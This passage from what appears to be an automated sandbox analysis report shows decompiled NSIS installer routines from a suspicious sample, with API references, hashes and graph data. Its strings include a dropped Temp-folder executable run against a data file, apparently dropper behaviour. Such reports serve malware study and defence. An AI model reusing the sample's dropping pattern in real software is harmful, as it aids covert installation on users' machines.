                      					if( *(_t86 + 8) == _t77) {
                      						E00406133(_t81);
                      					}
                      					__eflags =  *(_t86 + 8) - 1;
                      					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                      					__eflags = _t43 - 0xffffffff;
                      					 *(_t86 - 0x38) = _t43;
                      					if(_t43 != 0xffffffff) {
                      						break;
                      					}
                      					__eflags =  *(_t86 + 8) - _t77;
                      					if( *(_t86 + 8) != _t77) {
                      						E004056CA(0xffffffe2,  *(_t86 - 8));
                      						__eflags =  *(_t86 + 8) - 2;
                      						if(__eflags == 0) {
                      							 *((intOrPtr*)(_t86 - 4)) = 1;
                      						}
                      						L31:
                      						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
                      						__eflags =  *0x42a2e8;
                      						goto L32;
                      					} else {
                      						E00406668(0x40b5f8, _t83);
                      						E00406668(_t83, _t81);
                      						E004066A5(_t77, _t81, _t83, "C:\Users\FRONTD~1\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
                      						E00406668(_t83, 0x40b5f8);
                      						_t64 = E00405CC8("C:\Users\FRONTD~1\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
                      						__eflags = _t64;
                      						if(_t64 == 0) {
                      							continue;
                      						} else {
                      							__eflags = _t64 == 1;
                      							if(_t64 == 1) {
                      								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
                      								L32:
                      								_t51 = 0;
                      								__eflags = 0;
                      							} else {
                      								_push(_t81);
                      								_push(0xfffffffa);
                      								E004056CA();
                      								L29:
                      								_t51 = 0x7fffffff;
                      							}
                      						}
                      					}
                      					L33:
                      					return _t51;
                      				}
                      				E004056CA(0xffffffea,  *(_t86 - 8));
                      				 *0x42a314 =  *0x42a314 + 1;
                      				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                      				 *0x42a314 =  *0x42a314 - 1;
                      				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                      				_t84 = _t45;
                      				if( *(_t86 - 0x24) != 0xffffffff) {
                      					L22:
                      					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                      				} else {
                      					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                      					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                      						goto L22;
                      					}
                      				}
                      				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
                      				__eflags = _t84 - _t77;
                      				if(_t84 >= _t77) {
                      					goto L31;
                      				} else {
                      					__eflags = _t84 - 0xfffffffe;
                      					if(_t84 != 0xfffffffe) {
                      						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
                      					} else {
                      						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
                      						lstrcatW(_t81,  *(_t86 - 8));
                      					}
                      					_push(0x200010);
                      					_push(_t81);
                      					E00405CC8();
                      					goto L29;
                      				}
                      				goto L33;
                      			}


















                      0x0040176f
                      0x00401776
                      0x00401782
                      0x00401785
                      0x0040178a
                      0x0040178d
                      0x00401794
                      0x004017b0
                      0x00401796
                      0x00401797
                      0x00401797
                      0x004017b6
                      0x004017bb
                      0x004017bb
                      0x004017bf
                      0x004017c2
                      0x004017c7
                      0x004017c9
                      0x004017cb
                      0x004017d0
                      0x004017d0
                      0x004017db
                      0x004017db
                      0x004017ec
                      0x004017ee
                      0x004017ee
                      0x004017ef
                      0x004017ef
                      0x004017f2
                      0x004017f5
                      0x004017f8
                      0x004017f8
                      0x004017ff
                      0x0040180e
                      0x00401813
                      0x00401816
                      0x00401819
                      0x00000000
                      0x00000000
                      0x0040181b
                      0x0040181e
                      0x00401874
                      0x00401879
                      0x004015b6
                      0x0040292e
                      0x0040292e
                      0x00402c2a
                      0x00402c2d
                      0x00402c2d
                      0x00000000
                      0x00401820
                      0x00401826
                      0x0040182d
                      0x0040183a
                      0x00401845
                      0x0040185b
                      0x0040185b
                      0x0040185e
                      0x00000000
                      0x00401864
                      0x00401864
                      0x00401865
                      0x00401882
                      0x00402c33
                      0x00402c33
                      0x00402c33
                      0x00401867
                      0x00401867
                      0x00401868
                      0x00401493
                      0x0040239d
                      0x0040239d
                      0x0040239d
                      0x00401865
                      0x0040185e
                      0x00402c35
                      0x00402c39
                      0x00402c39
                      0x00401892
                      0x00401897
                      0x004018a5
                      0x004018aa
                      0x004018b0
                      0x004018b4
                      0x004018b6
                      0x004018be
                      0x004018ca
                      0x004018b8
                      0x004018b8
                      0x004018bc
                      0x00000000
                      0x00000000
                      0x004018bc
                      0x004018d3
                      0x004018d9
                      0x004018db
                      0x00000000
                      0x004018e1
                      0x004018e1
                      0x004018e4
                      0x004018fc
                      0x004018e6
                      0x004018e9
                      0x004018f2
                      0x004018f2
                      0x00401901
                      0x00401906
                      0x00402398
                      0x00000000
                      0x00402398
                      0x00000000

                      APIs
                      • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                      • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\AppData\Local\Temp\somvwkehjlp.rt,"C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\AppData\Local\Temp\somvwkehjlp.rt,00000000,00000000,"C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\AppData\Local\Temp\somvwkehjlp.rt,C:\Users\user~1\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                        • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                        • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                        • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                        • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                        • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                        • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                        • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                        • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                      • String ID: "C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\AppData\Local\Temp\somvwkehjlp.rt$C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp
                      • API String ID: 1941528284-1540923458
                      • Opcode ID: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                      • Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
                      • Opcode Fuzzy Hash: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                      • Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 525 4069c5-4069e5 GetSystemDirectoryW 526 4069e7 525->526 527 4069e9-4069eb 525->527 526->527 528 4069fc-4069fe 527->528 529 4069ed-4069f6 527->529 530 4069ff-406a32 wsprintfW LoadLibraryExW 528->530 529->528 531 4069f8-4069fa 529->531 531->530
                      C-Code - Quality: 100%
                      			E004069C5(intOrPtr _a4) {
                      				short _v576;
                      				signed int _t13;
                      				struct HINSTANCE__* _t17;
                      				signed int _t19;
                      				void* _t24;
                      
                      				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                      				if(_t13 > 0x104) {
                      					_t13 = 0;
                      				}
                      				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                      					_t19 = 1;
                      				} else {
                      					_t19 = 0;
                      				}
                      				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                      				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                      				return _t17;
                      			}








                      0x004069dc
                      0x004069e5
                      0x004069e7
                      0x004069e7
                      0x004069eb
                      0x004069fe
                      0x004069f8
                      0x004069f8
                      0x004069f8
                      0x00406a17
                      0x00406a2b
                      0x00406a32

                      APIs
                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                      • wsprintfW.USER32 ref: 00406A17
                      • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: DirectoryLibraryLoadSystemwsprintf
                      • String ID: %s%S.dll$UXTHEME$\
                      • API String ID: 2200240437-1946221925
                      • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                      • Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
                      • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                      • Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 532 405b99-405be4 CreateDirectoryW 533 405be6-405be8 532->533 534 405bea-405bf7 GetLastError 532->534 535 405c11-405c13 533->535 534->535 536 405bf9-405c0d SetFileSecurityW 534->536 536->533 537 405c0f GetLastError 536->537 537->535
                      C-Code - Quality: 100%
                      			E00405B99(WCHAR* _a4) {
                      				struct _SECURITY_ATTRIBUTES _v16;
                      				struct _SECURITY_DESCRIPTOR _v36;
                      				int _t22;
                      				long _t23;
                      
                      				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                      				_v36.Owner = 0x4083f8;
                      				_v36.Group = 0x4083f8;
                      				_v36.Sacl = _v36.Sacl & 0x00000000;
                      				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                      				_v16.lpSecurityDescriptor =  &_v36;
                      				_v36.Revision = 1;
                      				_v36.Control = 4;
                      				_v36.Dacl = 0x4083e8;
                      				_v16.nLength = 0xc;
                      				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                      				if(_t22 != 0) {
                      					L1:
                      					return 0;
                      				}
                      				_t23 = GetLastError();
                      				if(_t23 == 0xb7) {
                      					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                      						goto L1;
                      					}
                      					return GetLastError();
                      				}
                      				return _t23;
                      			}







                      0x00405ba4
                      0x00405ba8
                      0x00405bab
                      0x00405bb1
                      0x00405bb5
                      0x00405bb9
                      0x00405bc1
                      0x00405bc8
                      0x00405bce
                      0x00405bd5
                      0x00405bdc
                      0x00405be4
                      0x00405be6
                      0x00000000
                      0x00405be6
                      0x00405bf0
                      0x00405bf7
                      0x00405c0d
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00405c0f
                      0x00405c13

                      APIs
                      • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 00405BDC
                      • GetLastError.KERNEL32 ref: 00405BF0
                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                      • GetLastError.KERNEL32 ref: 00405C0F
                      Strings
                      • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405BBF
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                      • String ID: C:\Users\user~1\AppData\Local\Temp\
                      • API String ID: 3449924974-2382934351
                      • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                      • Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
                      • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                      • Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 538 406187-406193 539 406194-4061c8 GetTickCount GetTempFileNameW 538->539 540 4061d7-4061d9 539->540 541 4061ca-4061cc 539->541 543 4061d1-4061d4 540->543 541->539 542 4061ce 541->542 542->543
                      C-Code - Quality: 100%
                      			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                      				intOrPtr _v8;
                      				short _v12;
                      				short _t12;
                      				intOrPtr _t13;
                      				signed int _t14;
                      				WCHAR* _t17;
                      				signed int _t19;
                      				signed short _t23;
                      				WCHAR* _t26;
                      
                      				_t26 = _a4;
                      				_t23 = 0x64;
                      				while(1) {
                      					_t12 =  *L"nsa"; // 0x73006e
                      					_t23 = _t23 - 1;
                      					_v12 = _t12;
                      					_t13 =  *0x40a5ac; // 0x61
                      					_v8 = _t13;
                      					_t14 = GetTickCount();
                      					_t19 = 0x1a;
                      					_v8 = _v8 + _t14 % _t19;
                      					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                      					if(_t17 != 0) {
                      						break;
                      					}
                      					if(_t23 != 0) {
                      						continue;
                      					} else {
                      						 *_t26 =  *_t26 & _t23;
                      					}
                      					L4:
                      					return _t17;
                      				}
                      				_t17 = _t26;
                      				goto L4;
                      			}












                      0x0040618d
                      0x00406193
                      0x00406194
                      0x00406194
                      0x00406199
                      0x0040619a
                      0x0040619d
                      0x004061a2
                      0x004061a5
                      0x004061af
                      0x004061bc
                      0x004061c0
                      0x004061c8
                      0x00000000
                      0x00000000
                      0x004061cc
                      0x00000000
                      0x004061ce
                      0x004061ce
                      0x004061ce
                      0x004061d1
                      0x004061d4
                      0x004061d4
                      0x004061d7
                      0x00000000

                      APIs
                      • GetTickCount.KERNEL32 ref: 004061A5
                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403923), ref: 004061C0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: CountFileNameTempTick
                      • String ID: C:\Users\user~1\AppData\Local\Temp\$nsa
                      • API String ID: 1716503409-3083371207
                      • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                      • Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
                      • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                      • Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 544 403c25-403c34 545 403c40-403c48 544->545 546 403c36-403c39 CloseHandle 544->546 547 403c54-403c60 call 403c82 call 405d74 545->547 548 403c4a-403c4d CloseHandle 545->548 546->545 552 403c65-403c66 547->552 548->547
                      C-Code - Quality: 100%
                      			E00403C25() {
                      				void* _t1;
                      				void* _t2;
                      				void* _t4;
                      				signed int _t11;
                      
                      				_t1 =  *0x40a018; // 0xffffffff
                      				if(_t1 != 0xffffffff) {
                      					CloseHandle(_t1);
                      					 *0x40a018 =  *0x40a018 | 0xffffffff;
                      				}
                      				_t2 =  *0x40a01c; // 0xffffffff
                      				if(_t2 != 0xffffffff) {
                      					CloseHandle(_t2);
                      					 *0x40a01c =  *0x40a01c | 0xffffffff;
                      					_t11 =  *0x40a01c;
                      				}
                      				E00403C82();
                      				_t4 = E00405D74(_t11, L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp\\nsvBAAD.tmp\\", 7); // executed
                      				return _t4;
                      			}







                      0x00403c25
                      0x00403c34
                      0x00403c37
                      0x00403c39
                      0x00403c39
                      0x00403c40
                      0x00403c48
                      0x00403c4b
                      0x00403c4d
                      0x00403c4d
                      0x00403c4d
                      0x00403c54
                      0x00403c60
                      0x00403c66

                      APIs
                      • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user~1\AppData\Local\Temp\,00403B71,?), ref: 00403C37
                      • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user~1\AppData\Local\Temp\,00403B71,?), ref: 00403C4B
                      Strings
                      • C:\Users\user~1\AppData\Local\Temp\nsvBAAD.tmp\, xrefs: 00403C5B
                      • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403C2A
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: CloseHandle
                      • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\nsvBAAD.tmp\
                      • API String ID: 2962429428-3785307953
                      • Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                      • Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
                      • Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                      • Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 636 4015c1-4015d5 call 402da6 call 405fe2 641 401631-401634 636->641 642 4015d7-4015ea call 405f64 636->642 644 401663-4022f6 call 401423 641->644 645 401636-401655 call 401423 call 406668 SetCurrentDirectoryW 641->645 649 401604-401607 call 405c16 642->649 650 4015ec-4015ef 642->650 659 402c2a-402c39 644->659 660 40292e-402935 644->660 645->659 662 40165b-40165e 645->662 657 40160c-40160e 649->657 650->649 654 4015f1-4015f8 call 405c33 650->654 654->649 667 4015fa-4015fd call 405b99 654->667 663 401610-401615 657->663 664 401627-40162f 657->664 660->659 662->659 668 401624 663->668 669 401617-401622 GetFileAttributesW 663->669 664->641 664->642 672 401602 667->672 668->664 669->664 669->668 672->657
                      C-Code - Quality: 86%
                      			E004015C1(short __ebx, void* __eflags) {
                      				void* _t17;
                      				int _t23;
                      				void* _t25;
                      				signed char _t26;
                      				short _t28;
                      				short _t31;
                      				short* _t34;
                      				void* _t36;
                      
                      				_t28 = __ebx;
                      				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                      				_t17 = E00405FE2(_t16);
                      				_t32 = _t17;
                      				if(_t17 != __ebx) {
                      					do {
                      						_t34 = E00405F64(_t32, 0x5c);
                      						_t31 =  *_t34;
                      						 *_t34 = _t28;
                      						if(_t31 != _t28) {
                      							L5:
                      							_t25 = E00405C16( *(_t36 + 8));
                      						} else {
                      							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                      							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
                      								goto L5;
                      							} else {
                      								_t25 = E00405B99( *(_t36 + 8)); // executed
                      							}
                      						}
                      						if(_t25 != _t28) {
                      							if(_t25 != 0xb7) {
                      								L9:
                      								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                      							} else {
                      								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                      								if((_t26 & 0x00000010) == 0) {
                      									goto L9;
                      								}
                      							}
                      						}
                      						 *_t34 = _t31;
                      						_t32 = _t34 + 2;
                      					} while (_t31 != _t28);
                      				}
                      				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                      					_push(0xfffffff5);
                      					E00401423();
                      				} else {
                      					E00401423(0xffffffe6);
                      					E00406668(L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp",  *(_t36 + 8));
                      					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                      					if(_t23 == 0) {
                      						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                      					}
                      				}
                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
                      				return 0;
                      			}











                      0x004015c1
                      0x004015c9
                      0x004015cc
                      0x004015d1
                      0x004015d5
                      0x004015d7
                      0x004015df
                      0x004015e1
                      0x004015e4
                      0x004015ea
                      0x00401604
                      0x00401607
                      0x004015ec
                      0x004015ec
                      0x004015ef
                      0x00000000
                      0x004015fa
                      0x004015fd
                      0x004015fd
                      0x004015ef
                      0x0040160e
                      0x00401615
                      0x00401624
                      0x00401624
                      0x00401617
                      0x0040161a
                      0x00401622
                      0x00000000
                      0x00000000
                      0x00401622
                      0x00401615
                      0x00401627
                      0x0040162b
                      0x0040162c
                      0x004015d7
                      0x00401634
                      0x00401663
                      0x004022f1
                      0x00401636
                      0x00401638
                      0x00401645
                      0x0040164d
                      0x00401655
                      0x0040165b
                      0x0040165b
                      0x00401655
                      0x00402c2d
                      0x00402c39

                      APIs
                        • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,772EFAA0,?,772EF560,00405D94,?,772EFAA0,772EF560,00000000), ref: 00405FF0
                        • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                        • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                        • Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 00405BDC
                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user~1\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                      Strings
                      • C:\Users\user~1\AppData\Local\Temp, xrefs: 00401640
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                      • String ID: C:\Users\user~1\AppData\Local\Temp
                      • API String ID: 1892508949-3107243751
                      • Opcode ID: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                      • Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
                      • Opcode Fuzzy Hash: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                      • Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
